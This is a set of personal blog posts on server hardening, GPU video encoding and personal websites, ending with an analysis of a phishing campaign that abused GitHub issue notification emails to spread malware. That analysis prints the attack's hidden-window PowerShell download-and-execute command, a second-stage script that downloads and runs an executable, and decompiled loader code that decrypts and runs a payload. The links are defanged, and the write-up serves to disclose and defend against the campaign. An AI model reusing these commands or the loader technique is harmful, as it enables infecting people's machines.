Let's talk about some of the simple and practical steps you can take to improve your GitHub account security. There are plenty of good reasons to keep any online account safe, but I feel that GitHub deserves special attention among developers. With automation through CI and CD taking center stage, ensuring your GitHub account is secure matters not only to you but to anybody who might rely on your code.

The Basics

Let's start with the basics, things that don't just apply to GitHub but to nearly any online service.

Passwords

Let's face it, passwords freaking suck. We all know we're supposed to make them hard to guess and not to reuse them, but who has time to remember each and every password? Nobody, that's who. But what if there was a solution where you could have unique passwords for each of your accounts, not have to remember them all, and have strong passwords that are difficult for humans and computers alike to guess? The solution is a password manager....

More from Ian's Blog

Securing My Web Infrastructure

A few months ago, I very briefly mentioned that I've migrated all my web infrastructure off Cloudflare, as well as having built a custom web service to host it all. I call this new web service WebCentral, and I'd like to talk about some of the steps I've taken and lessons I've learned about how I secure my infrastructure.

Building a Threat Model

Before you can work to secure any service, you need to understand what your threat model is. This sounds more complicated than it really is; all you must do is consider what your risks are, how likely those risks are to be realized, and what potential damage or impact those risks could have. My websites don't store or process any user data, so I'm not terribly concerned about exfiltration; instead, my primary risks are unauthorized access to the server, exploitation of my code, and denial of service. Although the risks of denial of service are self-explanatory, the primary risk I see needing to protect against is malicious code running on the machine. Malicious actors are always looking for places to run their cryptocurrency miners or spam botnets, and falling victim to that is simply out of the question. While I can do my best to try and ensure I'm writing secure code, there's always going to be the possibility that I or someone else makes a mistake that turns into an exploitable weakness. Therefore, my focus is on minimizing the potential impact should this occur.

VPS Security

The server that powers the very blog you're reading is a VPS (virtual private server) hosted by Azure. A VPS is just a fancy way to say a virtual machine that you have mostly total control over. A secure web service must start with a secure server hosting it, so let's go into detail about all the steps I take to keep the server safe.

Network Security

Minimizing internet-facing exposure is critical for any VPS and can be one of the most effective ways to keep a machine safe. My rule is simple: no open ports other than what is required for user traffic. In effect this means one thing: I cannot expose SSH to the internet. Doing so protects me against a wide range of threats and also reduces the impact from scanners (more on them later). While Azure itself offers several ways to interact with a running VPS, I've chosen to disable most of those features and instead rely on my own. I personally need to be able to access the machine over SSH, however, so how do I do that if SSH is blocked? I use a VPN. On my home network is a WireGuard VPN server, as well as a Dynamic DNS setup to work around my rotating residential IP address. The VM connects to the WireGuard VPN server on my home network and establishes a private tunnel between them. Since the VM is the one initiating the connection (acting as a client), no port needs to be exposed. With this configuration I can effortlessly access and manage the machine without exposing SSH to the internet. I'm also experimenting with, but have not yet fully rolled out, an outbound firewall. Outbound firewalls are far, far more difficult to set up than inbound ones because you must first have a very good understanding of what and where your machine talks to.
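To make that policy concrete, here's a rough sketch of what it could look like with firewalld (which ships with RHEL-family distros) - on Azure you can enforce the same thing with network security groups instead, and the WireGuard line assumes a wireguard-tools config at /etc/wireguard/wg0.conf, which may not match your setup:

```bash
# Only web traffic is allowed in; SSH is not exposed at all.
firewall-cmd --permanent --remove-service=ssh
firewall-cmd --permanent --add-service=http
firewall-cmd --permanent --add-service=https
firewall-cmd --reload

# The VM dials out to the home WireGuard server, so no inbound port is needed.
systemctl enable --now wg-quick@wg0
```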
OS-Level Security

Although the internet footprint of my VPS is restricted to only HTTP and HTTPS, I still must face the risk of someone exploiting a vulnerability in my code. I've taken a few steps to help minimize the impact of a compromise to my web application's security.

Automatic Updates

First is one of the most basic things everyone should be doing: automatic updates and reboots. Every day I download and install any updates and restart the VPS if needed. All of this is trivially easy with a cron job and built-in tooling. This is the script that the cron job runs:

```bash
#!/bin/bash

# Check for updates
dnf check-update > /dev/null
if [[ $? == 0 ]]; then
    # Nothing to update
    exit 0
fi

# Install updates
dnf -y update

# Check if we need to reboot
dnf needs-restarting -r
if [[ $? == 1 ]]; then
    reboot
fi
```

Low-Privileged Accounts

Second, the actual process serving traffic does not run as root; instead it runs as a dedicated service user without a shell and without sudo permission. Doing this limits what an attacker might be able to do, should they somehow gain the ability to execute shell code on the machine. A challenge with using non-root users for web services is a specific security restriction enforced by Linux: only the root user can bind to ports below 1024. Thankfully, SystemD services can be granted additional capabilities, one of which is the capability to bind to privileged ports. A single line in the service file is all it takes to overcome this challenge.

Filesystem Isolation

Lastly, the process also uses a virtualized root filesystem, a technique known as chroot(). Chrooting is a method where the Linux kernel effectively lies to the process about where the root of the filesystem is by prepending a path to every call to access the filesystem. To chroot a process, you provide a directory that will act as the filesystem root for that process, meaning if the process were to try to list the contents of the root (/), it would instead be listing the contents of the directory you specified. When configured properly, this has the effect of a filesystem allowlist - the process is only allowed to access data in the filesystem that you have specifically granted to it, and all of this without complicated permissions. It's important to note, however, that chrooting is often misunderstood as a more involved security control, because it's often incorrectly called a "jail" - referring to BSD's jails. Chrooting a process only isolates the filesystem from the process, but nothing else. In my specific use case it serves as an added layer of protection to guard against simple path traversal bugs. If an attacker were somehow able to trick the server into serving a sensitive file like /etc/passwd, it would fail because that file doesn't exist as far as the process knows.
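Setting up the service account and the chroot tree ahead of time only takes a couple of commands. This is just a sketch assuming the same layout as the service file below - exactly what the chroot directory needs to contain depends on what your binary expects to find:

```bash
# Dedicated service user: no home directory, no login shell, no sudo.
useradd --system --no-create-home --shell /usr/sbin/nologin webcentral

# The chroot tree. Everything the process can ever see lives under here;
# because of RootDirectory= (below), the in-chroot path /opt/webcentral/live
# is really /opt/webcentral/root/opt/webcentral/live on the host.
mkdir -p /opt/webcentral/root/opt/webcentral/{live,data}
chown -R webcentral:webcentral /opt/webcentral/root/opt/webcentral/data
```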
For those wondering, my SystemD service file looks like this:

```ini
[Unit]
Description=webcentral
After=syslog.target
After=network.target

[Service]
# I utilize systemd's heartbeat feature, sd-notify
Type=notify
NotifyAccess=main
WatchdogSec=5

# This is the directory that serves as the virtual root for the process
RootDirectory=/opt/webcentral/root

# The working directory for the process, this is automatically mapped to the
# virtual root so while the process sees this path, in actuality it would be
# /opt/webcentral/root/opt/webcentral
WorkingDirectory=/opt/webcentral

# Additional directories to pass through to the process
BindReadOnlyPaths=/etc/letsencrypt

# Remember all of the paths here are being mapped to the virtual root
ExecStart=/opt/webcentral/live/webcentral -d /opt/webcentral/data --production
ExecReload=/bin/kill -USR2 "$MAINPID"

TimeoutSec=5000
Restart=on-failure

# The low-privilege service user to run the process as
User=webcentral
Group=webcentral

# The additional capability to allow this process to bind to privileged ports
CapabilityBoundingSet=CAP_NET_BIND_SERVICE

[Install]
WantedBy=default.target
```

To quickly summarize: remote access (SSH) is blocked from the internet and a VPN must be used to access the VM, updates are automatically installed on the VM, the web process itself runs as a low-privileged service account, and that same process is chroot()-ed to shield the VM's filesystem.

Service Availability

Now it's time to shift focus away from the VPS to the application itself. One of, if not the, biggest benefits of running my own entire web server is that I can deeply integrate security controls however I see fit. For this, I focus on detection and rejection of malicious clients. Being on the internet means you will be constantly exposed to malicious traffic - it's just a fact of life. The overwhelming majority of this traffic is just scanners: people going over every available IP address and looking for widely known and exploitable vulnerabilities, things like leaving credentials out in the open or web shells. Generally, these scanners are one and done - you'll see a small handful of requests from a single address and then never again. I find that trying to block or prevent these scanners is a bit of a fool's errand; however, by tracking these scanners over time I can begin to identify patterns and proactively block them early, saving resources. Why this matters is not because of the one-and-done scanners, but because of the malicious ones, the ones that don't just send a handful of requests - they send hundreds, if not thousands, all at once. These scanners risk degrading the service for others by occupying server resources that would be better used for legitimate visitors. To detect malicious hosts, I employ some basic heuristics, focusing on the headers sent by the client and the paths they're trying to access.

Banned Paths

Having collected months of data from the traffic I served, I was able to identify some of the most common paths these scanners are looking for. One of the more common trends I see is scanning for weak and vulnerable WordPress configurations. WordPress is an incredibly common content management platform, which also makes it a prime target for attackers. Since I don't use WordPress (and perhaps you shouldn't either...), this made it a good candidate for scanner tracking. Therefore, any request where the path contains any of "wp-admin", "wp-content", "wp-includes", or "xmlrpc.php" is flagged as malicious and recorded.
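If you're curious how much of this traffic hits your own server, a quick pass over an access log will show the same pattern. A rough sketch, assuming a common-format access log at /var/log/access.log (adjust the path to wherever your server actually writes):

```bash
# Count requests for the WordPress-style paths flagged above, grouped by client IP.
grep -E 'wp-admin|wp-content|wp-includes|xmlrpc\.php' /var/log/access.log \
  | awk '{print $1}' | sort | uniq -c | sort -rn | head
```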
User Agents

The User Agent header is data sent by your web browser to the server that provides a vague description of the browser and the device it's running on. For example, my user agent when I wrote this post is:

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0

All this really tells the server is that I'm on a Mac running macOS 15 and using Firefox 128. One of the most effective measures I've found to block malicious traffic early is to do some very basic filtering by user agent. The simplest and most effective measure thus far has been to block requests that have no user agent header at all. I also have a growing list of bogus user agent values, where the header looks valid - but if you check the version numbers of the system or browser, nothing lines up.

IP Firewall

When clients start getting a bit too rowdy, they get put into the naughty corner: temporarily blocked from connecting. Blocked connections are rejected during the TCP handshake, saving resources as we skip the TLS negotiation. Addresses are blocked for 24 hours, and I've found this to be perfectly adequate, as most clients quickly give up and move on.

ASN Blocks

In some extreme situations, it's necessary to block entire services and all of their addresses from accessing my server. This happens when a network provider, such as an ISP, VPN, or cloud provider, fails to do their job of preventing abuse of their services and malicious actors find a home there. Cloud providers have a responsibility to ensure that if a malicious customer is using their service, they terminate their accounts and stop providing their services. For the most part, these cloud providers do a decent enough job at that. Some providers, however, don't care - at all - and quickly become popular amongst malicious actors. Cloudflare and Alibaba are two great examples. Because of the sheer volume of malicious traffic and total lack of valid user traffic, I block all of Cloudflare and Alibaba's address space. Specifically, I block AS13335 and AS45102.

Putting It All Together

Summarized, this is the path a request takes when connecting to my server: upon receiving a TCP connection, the IP address of the client is checked against the blocked ASNs and the individually blocked addresses. If it matches, the request is quickly rejected. Otherwise, TLS is negotiated, allowing the server to see the details of the actual HTTP request. We then check whether the request is for a banned path or has a banned user agent; if so, the IP is blocked for 24 hours and the request is rejected. Otherwise, the request is served as normal.

The Result

I feel this graph speaks for itself: it shows the number of requests that were blocked per minute. These bursts are the malicious scanners that I'm working to block, and all of these were successful defences against them. This will be a never-ending fight, but that's part of the fun, innit?
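I do all of this blocking inside my own web server, but if you wanted to approximate the 24-hour timeout behaviour with off-the-shelf tooling, an nftables set with element timeouts captures the same idea (the table, chain, and set names here are just for illustration):

```bash
nft add table inet filter
nft add chain inet filter input '{ type filter hook input priority 0 ; }'
nft add set inet filter naughty_corner '{ type ipv4_addr ; flags timeout ; }'
nft add rule inet filter input ip saddr @naughty_corner drop
# Block a client for 24 hours (192.0.2.10 is a documentation address).
nft add element inet filter naughty_corner '{ 192.0.2.10 timeout 24h }'
```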

Hardware-Accelerated Video Encoding with Intel Arc on Redhat Linux

I've been wanting hardware-accelerated video encoding on my Linux machine for quite a while now, but ask anybody who's used a Linux machine and they'll tell you of the horrors of Nvidia or AMD drivers. Intel, on the other hand, seems to be taking things in a much different, much more positive direction when it comes to their Arc graphics cards. I've heard positive things from people who use them about the relatively painless driver experience, at least when compared to Nvidia. So I went out and grabbed a used Intel Arc A750 locally and installed it in my server running Rocky 9.4. This post documents what I did to install the required drivers and support libraries to be able to encode videos with ffmpeg utilizing the hardware of the GPU. This post is specific to Redhat Linux and all Redhat-compatible distros (Rocky, Oracle, etc). If you're using any other distro, this post likely won't help you.

Driver Setup

The drivers for Intel Arc cards were added to the Linux kernel in version 6.2, but RHEL 9 uses a 5.x kernel. Thankfully, Intel provides a repo specific to RHEL 9 where they offer precompiled backports of the drivers against the stable kernel ABI of RHEL 9.

Add the Intel Repo

Add the following repo file to /etc/yum.repos.d. Note that I'm using RHEL 9.4 here. You will likely need to change 9.4 to whatever version you are using by looking in /etc/redhat-release. Update the baseurl value and ensure that URL exists.

```ini
[intel-graphics-9.4-unified]
name=Intel graphics 9.4 unified
enabled=1
gpgcheck=1
baseurl=https://repositories.intel.com/gpu/rhel/9.4/unified/
gpgkey=https://repositories.intel.com/gpu/intel-graphics.key
```

Run dnf clean all for good measure.

Install the Software

```bash
dnf install intel-opencl \
    intel-media \
    intel-mediasdk \
    libmfxgen1 \
    libvpl2 \
    level-zero \
    intel-level-zero-gpu \
    mesa-dri-drivers \
    mesa-vulkan-drivers \
    mesa-vdpau-drivers \
    libdrm \
    mesa-libEGL \
    mesa-lib
```

Reboot your machine for good measure.

Verify Device Availability

You can verify that your GPU is seen using the following:

```
clinfo | grep "Device Name"
  Device Name    Intel(R) Arc(TM) A750 Graphics
  Device Name    Intel(R) Arc(TM) A750 Graphics
  Device Name    Intel(R) Arc(TM) A750 Graphics
  Device Name    Intel(R) Arc(TM) A750 Graphics
```

ffmpeg Setup

Install ffmpeg

ffmpeg needs to be compiled with libvpl support. For simplicity's sake, you can use this pre-compiled static build of ffmpeg. Download the ffmpeg-master-latest-linux64-gpl.tar.xz binary.

Verify ffmpeg support

If you're going to use a different copy of ffmpeg, or compile it yourself, you'll want to verify that it has the required support using the following:

```
./ffmpeg -hide_banner -encoders | grep "qsv"
 V..... av1_qsv     AV1 (Intel Quick Sync Video acceleration) (codec av1)
 V..... h264_qsv    H.264 / AVC / MPEG-4 AVC / MPEG-4 part 10 (Intel Quick Sync Video acceleration) (codec h264)
 V..... hevc_qsv    HEVC (Intel Quick Sync Video acceleration) (codec hevc)
 V..... mjpeg_qsv   MJPEG (Intel Quick Sync Video acceleration) (codec mjpeg)
 V..... mpeg2_qsv   MPEG-2 video (Intel Quick Sync Video acceleration) (codec mpeg2video)
 V..... vp9_qsv     VP9 video (Intel Quick Sync Video acceleration) (codec vp9)
```

If you don't have any qsv encoders, your copy of ffmpeg isn't built correctly.

Converting a Video

I'll be using this video from the Wikimedia Commons for reference, if you want to play along at home. This is a VP9-encoded video in a webm container. Let's re-encode it to H.264 in an MP4 container.
I'll skip doing any other transformations to the video for now, just to keep things simple.

```bash
./ffmpeg -i Sea_to_Sky_Highlights.webm -c:v h264_qsv Sea_to_Sky_Highlights.mp4
```

The key parameter here is telling ffmpeg to use the h264_qsv encoder for the video, which is the hardware-accelerated codec. Let's see what kind of difference using hardware acceleration makes:

Encoder              | Time     | Average FPS
h264_qsv (Hardware)  | 3.02s    | 296
libx264 (Software)   | 1m2.996s | 162

Using hardware acceleration sped up this operation by 95%. Naturally your numbers won't be the same as mine, as there are lots of variables at play here, but I feel this is a good demonstration that this was a worthwhile investment.
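If you want to run the same comparison yourself, timing both encoders on the same source is enough to get rough numbers like those in the table above (just a sketch - ffmpeg reports its own average fps as it runs):

```bash
# Hardware encode via Quick Sync
time ./ffmpeg -i Sea_to_Sky_Highlights.webm -c:v h264_qsv hw.mp4
# Software encode with libx264 for comparison
time ./ffmpeg -i Sea_to_Sky_Highlights.webm -c:v libx264 sw.mp4
```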

Having a Website Used to Be Fun

According to the Wayback Machine, I launched my website over a decade ago, in 2013. Just that thought alone makes me feel old, but going back through the old snapshots of my websites gave me a profound feeling of longing for a time when having a website used to be a novel and enjoyable experience.

The Start

Although I no longer have the original invoice, I believe I purchased the ianspence.com domain in 2012 when I was studying web design at The Art Institute of Vancouver. Yes, you read that right, I went to art school. Not just any, mind you, but one that was so catastrophically corrupt and profit-focused that it imploded as I was studying there. But that's a story for another time. I obviously didn't have any real plan for what I wanted my website to be, or what I would use it for. I simply wanted a web property where I could play around with what I was learning in school and expand my knowledge of PHP. I hosted my earliest sites from a very used Dell Optiplex GX280 tower in my house on my residential internet. Although the early 2010s were a rough period of my life, having my very own website was something that I was proud of and deeply enjoyed. Somewhere along the way, all that enjoyment was lost. And you don't have to take my own word for it. Just compare my site from 2013 to the site from when I wrote this post in 2024.

Graphic Design was Never My Passion

2013's website has an animated carousel of my photography, bright colours, and way too many accordions. Everything was at 100% because I didn't care so much about the final product as I did about just screwing around and having fun. 2024's website is, save for the single sample of my photography work, a resume. Boring, professional, sterile of anything resembling personality. Even though the style of my site became more and more muted over the years, I continued to work and build on my site, but what I worked on changed as my interests grew. In the very early 2010s I thought I wanted to go into web design, but after having suffered 4 months of the most dysfunctional art school there is, I realized that maybe it was web development that interested me. That, eventually, grew into the networking and infrastructure training I went through, and the career I've built for myself.

Changing Interests

As my interests changed, my focus on the site became less about the design and appearance and more about what was serving the site itself. My site literally moved out from the basement suite I was living in to a VPS, running custom builds of PHP and Apache HTTPD. At one point, I even played around with load-balancing between my VPS and my home server, which had graduated into something much better than that Dell. Or, at least until my internet provider blocked inbound port 80. This is right around when things stopped being fun anymore.

When Things Stopped Being Fun

Upon reflection, there were two big mistakes I made that stole all of the enjoyment out of tinkering with my websites: Cloudflare and scaling.

Cloudflare

A dear friend of mine (they know I'm referring to them) introduced me to Cloudflare sometime in 2014, which I believe was the poison pill that started my journey into taking the fun out of things for me. You see, Cloudflare is designed for big businesses or people with very high traffic websites. Neither of which apply to me. I was just some dweeb who liked PHP. Cloudflare works by sitting between your website's hosting server and your visitors.
All traffic from your visitors flows through Cloudflare, where they can do their magic. When configured properly, the original web host is effectively hidden from the web, as people have to go through Cloudflare first. This was the crux of my issues with Cloudflare, at least as far as this blog post is concerned. For example, before Let's Encrypt existed, Cloudflare did not allow for TLS at all on their free plans. This was right at the time when I was just starting to learn about TLS, but because I had convinced myself that I had to use Cloudflare, I could never actually use it on my website. This specific problem of TLS never went away, either, because even though Cloudflare now offers free TLS, they have total control over everything and they have the final say in what is and isn't allowed. The problems weren't just TLS, of course, because if you wanted to handle non-HTTP traffic then you couldn't use Cloudflare's proxy. Once again, I encountered the same misguided fear that exposing my web server to the internet was a recipe for disaster.

Scaling (or lack thereof)

The other, larger, mistake I made was an obsession with scaling and security. Thanks to my education I had learned a lot about enterprise networking and systems administration, and I deigned to apply those skills to my own site. Aggressive caching, global CDNs, monitoring, automated deployments, telemetry, obsession over response times, and probably more I'm not remembering. All for a mostly static website for a dork that had maybe 5 page views a month. This is a mistake that I see people make all the time, and not just with websites - people think that they need to be concerned about scaling problems without first asking whether those problems even apply, or will ever apply, to them. If I was able to host my website just fine from an abused desktop tower with blown caps on cable internet, then why in the world would I need to obsess over telemetry and response times? Sadly, things only got worse when I got into cybersecurity, because now on top of all the concerns with performance and scale, I was trying to protect myself from exceedingly unlikely threats. Up until embarrassingly recently I was using complicated file integrity checks with hardware-backed cryptographic keys to ensure that only I could make changes to the content of my site. For some reason, I had built this threat model in my head where I needed to protect against malicious changes on an already well-protected server. All of this created an environment where making any change at all was a cumbersome and time-consuming task. Is it any wonder that I ended up making my site look like a resume, when doing any change to it was so much work?

The Lesson I Learned

All of this retrospective started because of the death of Cohost, as many of the folks there (myself included) decided to move to posting on their own blogs. This gave me a great chance to see what some of my friends were doing with their sites, unlocking fond memories of back in 2012 and 2013 when I too was just having fun with my silly little website. All of this led me to the realization of the true root cause of my misery: in an attempt to mimic what enterprises do with their websites in terms of stability and security, I had made it difficult to make any changes to my site. Realizing this, I began to unravel the design and decisions I had made, and came up with a much better, simpler, and most of all enjoyable design.
How my Website Used to Work

The last design of my website that existed before I came to the conclusions I discussed above was as follows: my website was a packaged Docker container image which ran nginx. All of the configuration and static files were included in the image, so theoretically it could run anywhere. That image was run on Azure Container Instances, a managed container platform, with the image hosted on Azure Container Registry. Cloudflare sat in front of my website and proxied all connections to it. They took care of the domain registration, DNS, and TLS. Whenever I wanted to make changes to my site, I would create a container image, sign it using a private key on my YubiKey, and push that to GitHub. A GitHub action would then deploy that image to Azure Container Registry and trigger the container to restart, pulling the new image.

How my Website Works Now

Now that you've seen the most ridiculous design for some dork's personal website, let me show you how it works now. Yes, it's really that simple. My websites are now powered by a virtual machine with a public IP address. When users visit my website, they talk directly to that virtual machine. When I want to make changes to my website, I just push them directly to that machine. TLS certificates are provided by Let's Encrypt. I still use Cloudflare as my domain registrar and DNS provider, but - crucially - nothing is proxied through Cloudflare. When you loaded this blog post, your browser talked directly to my server. It's virtually identical to the way I was doing things in 2013, and it's been invigorating to shed this excess weight and unnecessary complication. But there's actually a whole lot going on behind the scenes that I'm omitting from this diagram.

Static Websites Are Boring

A huge problem with my previous design is that I had locked myself into only having a pure static website, and static websites are boring! Websites are more fun when they can, you know, do things, and doing things with static websites usually depends on JavaScript running in the user's browser. That's lame. Let's take a really simple example: sometimes I want to show a banner at the top of my website. Unless you hard-code that banner into the HTML, doing this from a static site would require JavaScript to check some backend for whether a banner should be displayed and, if so, render it. But on a dynamic page, where server-side rendering is used? This is trivially easy. A key change with my new website is switching away from containers, which are ephemeral and immutable, to a virtual machine, which isn't, and going back to server-side rendering. I realized that a lot of the fun I was having back then was because PHP is server-side, and you can do a lot of wacky things when you have total control over the server! I'm really burying the lede here, but my new site is powered not by nginx, or httpd, but by my own web server. Entirely custom and designed for tinkering and hacking. Combined with no longer having to deal with Cloudflare, this has given me total control to do whatever the hell I want. Maybe I'll do another post some day talking about this - but I've written enough about websites for one day.

Wrapping Up

That feeling of wanting to do whatever the hell I want really does sum up the sentiment I've come to over the past few weeks. This is my website. I should be able to do whatever I want with it, free from my self-imposed judgement or concern over non-issues.
Kill the cop in your head that tells you to share the concerns that Google has. You're not Google. Websites should be fun. Enterprise tools like Cloudflare and managed containers aren't.

GitHub Notification Emails Hijacked to Send Malware

As an open source developer I frequently get emails from GitHub. Most of these emails are notifications sent on behalf of GitHub users to let me know that somebody has interacted with something and requires my attention. Perhaps somebody has created a new issue on one of my repos, or replied to a comment I left, or opened a pull request - or perhaps the user is trying to impersonate GitHub security and trick me into downloading malware. If that last one sounds out of place, well, I have bad news for you - it's happened to me. Twice. In one day.

Let me break down how this attack works:

1. The attacker, using a throw-away GitHub account, creates an issue on any one of your public repos
2. The attacker quickly deletes the issue
3. You receive a notification email as the owner of the repo
4. You click the link in the email, thinking it's legitimate
5. You follow the instructions and infect your system with malware

Now, as a savvy computer-haver you might think that you'd never fall for such an attack, but let me show you all the clever tricks employed here, and how attackers have found a way to hijack GitHub's email system to send malicious emails directly to project maintainers. To start, let's look at the email message I got. In text form (link altered for your safety):

Hey there! We have detected a security vulnerability in your repository. Please contact us at [https://]github-scanner[.]com to get more information on how to fix this issue. Best regards, Github Security Team

Without me having already told you that this email is a notification about a new GitHub issue being created on my repo, there's virtually nothing to go on that would tell you that, because the majority of this email is controlled by the attacker. Everything highlighted in red is, in one way or another, something the attacker can control - meaning the text or content is what they want it to say. Unfortunately, the remaining parts of the email that aren't controlled by the attacker don't provide sufficient context to know what's actually going on here. Nowhere in the email does it say that this is a new issue that has been created, which gives the attacker all the power to establish whatever context they want for this message. The attacker impersonates the "Github Security Team", and because this email is a legitimate email sent from GitHub, it passes most of the common phishing checks: the email is from GitHub, and the link in the email goes to where it says it does. GitHub can improve these notification emails to reduce the effectiveness of this type of attack by providing more context about what action the email is for, reducing the amount of attacker-controlled content, and improving clarity about the sender of the email. I have contacted GitHub security (the real one, not the fake imposter one) and shared these emails with them along with my concerns.

The Website

If you were to follow the link in that email, you'd find yourself on a page that appears to have a captcha on it. Captcha-gated sites are annoyingly common, thanks in part to services like Cloudflare which offers automated challenges based on heuristics. All this to say that users might not find a page immediately demanding they prove that they are human all that out of the ordinary. What is out of the ordinary is how the captcha works.
Normally you'd be clicking on a never-ending slideshow of sidewalks or motorcycles as you definitely don't help train AI, but instead this site is asking you to take the very specific step of opening the Windows Run box and pasting in a command. Honestly, if solving captchas were actually this easy, I'd be down for it. Sadly, it's not real - so now let's take a look at the malware.

The Malware

The site put the following text in my clipboard (link modified for your safety):

```powershell
powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752"
```

We'll consider this stage 1 of 4 of the attack. What this does is start a new Windows PowerShell process with the window hidden and run a command to download a script file and execute it. iex is a built-in alias for Invoke-Expression, and iwr is Invoke-WebRequest. For Linux users out there, this is the equivalent of calling curl | bash. The comment at the end of the line, combined with the Windows Run box's limited width, effectively hides the first part of the command, so the user only sees the "I am not a robot" text. Between the first email I got and the time of writing, the URL in the script has changed, but the contents remain the same. Moving on to the second stage, the contents of the evaluated script file are (link modified for your safety):

```powershell
$webClient = New-Object System.Net.WebClient
$url1 = "[https://]github-scanner[.]com/l6E.exe"
$filePath1 = "$env:TEMP\SysSetup.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath $env:TEMP\SysSetup.exe
```

This script is refreshingly straightforward, with virtually no obfuscation. It downloads a file l6E.exe, saves it as <User Home>\AppData\Local\Temp\SysSetup.exe, and then runs that file. I first took a look at the exe itself in Windows Explorer and noticed that it had a digital signature. The certificate used appears to have come from Spotify, but importantly the signature of the malicious binary is not valid - meaning it's likely this is just a spoofed signature that was copied from a legitimately-signed Spotify binary. The presence of this invalid codesigning signature itself is interesting, because it highlights two weaknesses in Windows that this malware exploits. I would have assumed that Windows would warn you before it runs an exe with an invalid code signature, especially one downloaded from the internet, but it turns out that's not entirely the case. It's important to know how Windows determines if something was downloaded from the internet, and this is done through what is commonly called the "Mark of the Web" (or MOTW). In short, this is a small flag set in the metadata of the file that says it came from the internet. Browsers and other software can set this flag, and other software can look for that flag and alter its behaviour accordingly. A good example is how Office behaves with a file downloaded from the internet. If you were to download that l6E.exe file in your web browser (please don't!) and tried to open it, you'd be greeted with a hilariously aged dialog. Note that at the bottom Windows specifically highlights that this application does not have a valid signature. But this warning never appears for the victim, and it has to do with the Mark of the Web. Step back for a moment and you'll recall that it's not the browser that is downloading this malicious exe; instead it's PowerShell - or, more specifically, the System.Net.WebClient class in .NET Framework.
This class has a method, DownloadFile, which does exactly that - downloads a file to a local path - except this method does not set the MOTW flag on the downloaded file. Take a look at a side-by-side comparison of the file downloaded using the same .NET API used by the malware on the left and a browser on the right: this exposes the other weakness in Windows. Windows will only warn you when you try to run an exe with an invalid digital signature if that file has the Mark of the Web. It is unwise to rely on the Mark of the Web in any way, as it's trivially easy to remove that flag. Had the .NET library set the flag, the attacker could have easily just removed it before starting the process. Both of these weaknesses have been reported to Microsoft, but for us we should stop getting distracted by code signing certificates and instead move on to looking at what this dang exe actually does.

I opened the exe in Ghidra and then realized that I know nothing about assembly or reverse engineering, but I did see mentions of .NET in the output, so I moved to dotPeek to see what I could find. There are two parts of the code that matter: the entrypoint and the PersonalActivation method. The entrypoint hides the console window, calls PersonalActivation twice in a background thread, then marks a region of memory as executable with VirtualProtect and executes it with CallWindowProcW.

```csharp
private static void Main(string[] args)
{
  Resolver resolver = new Resolver("Consulter", 100);
  Program.FreeConsole();
  double num = (double) Program.UAdhuyichgAUIshuiAuis();
  Task.Run((Action) (() =>
  {
    Program.PersonalActivation(new List<int>(), Program.AIOsncoiuuA, Program.Alco);
    Program.PersonalActivation(new List<int>(), MoveAngles.userBuffer, MoveAngles.key);
  }));
  Thread.Sleep(1000);
  uint ASxcgtjy = 0;
  Program.VirtualProtect(ref Program.AIOsncoiuuA[0], Program.AIOsncoiuuA.Length, 64U, ref ASxcgtjy);
  int index = 392;
  Program.CallWindowProcW(ref Program.AIOsncoiuuA[index], MoveAngles.userBuffer, 0, 0, 0);
}
```

The PersonalActivation function takes in a list and two byte arrays. The list parameter is not used; the first byte array is a data buffer and the second is labeled as a key. This, plus the amount of math they're doing, gives it away that this is some form of decryptor, though I'm not good enough at math to figure out which algorithm it is. I commented out the two calls to VirtualProtect and CallWindowProcW, compiled the rest of the code, and ran it in a debugger so that I could examine the contents of the two decrypted buffers.

The first buffer contains a call to CreateProcess:

```
00000000  55 05 00 00 37 13 00 00 00 00 00 00 75 73 65 72  U...7.......user
00000010  33 32 2E 64 6C 6C 00 43 72 65 61 74 65 50 72 6F  32.dll.CreatePro
00000020  63 65 73 73 41 00 56 69 72 74 75 61 6C 41 6C 6C  cessA.VirtualAll
00000030  6F 63 00 47 65 74 54 68 72 65 61 64 43 6F 6E 74  oc.GetThreadCont
00000040  65 78 74 00 52 65 61 64 50 72 6F 63 65 73 73 4D  ext.ReadProcessM
00000050  65 6D 6F 72 79 00 56 69 72 74 75 61 6C 41 6C 6C  emory.VirtualAll
00000060  6F 63 45 78 00 57 72 69 74 65 50 72 6F 63 65 73  ocEx.WriteProces
00000070  73 4D 65 6D 6F 72 79 00 53 65 74 54 68 72 65 61  sMemory.SetThrea
00000080  64 43 6F 6E 74 65 78 74 00 52 65 73 75 6D 65 54  dContext.ResumeT
00000090  68 72 65 61 64 00 39 05 00 00 BC 04 00 00 00 00  hread.9...¼.....
000000A0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000B0  00 00 00 00 00 00 43 3A 5C 57 69 6E 64 6F 77 73  ......C:\Windows
000000C0  5C 4D 69 63 72 6F 73 6F 66 74 2E 4E 45 54 5C 46  \Microsoft.NET\F
000000D0  72 61 6D 65 77 6F 72 6B 5C 76 34 2E 30 2E 33 30  ramework\v4.0.30
000000E0  33 31 39 5C 52 65 67 41 73 6D 2E 65 78 65 00 37  319\RegAsm.exe.7
[...]
```

And the second buffer, well, just take a look at the headers and you might just see what's going on :)

```
00000000  4D 5A 78 00 01 00 00 00 04 00 00 00 00 00 00 00  MZx.............
00000010  00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00  ............x...
00000040  0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ..º..´.Í!¸.LÍ!Th
00000050  69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F  is program canno
00000060  74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20  t be run in DOS 
00000070  6D 6F 64 65 2E 24 00 00 50 45 00 00 4C 01 04 00  mode.$..PE..L...
```

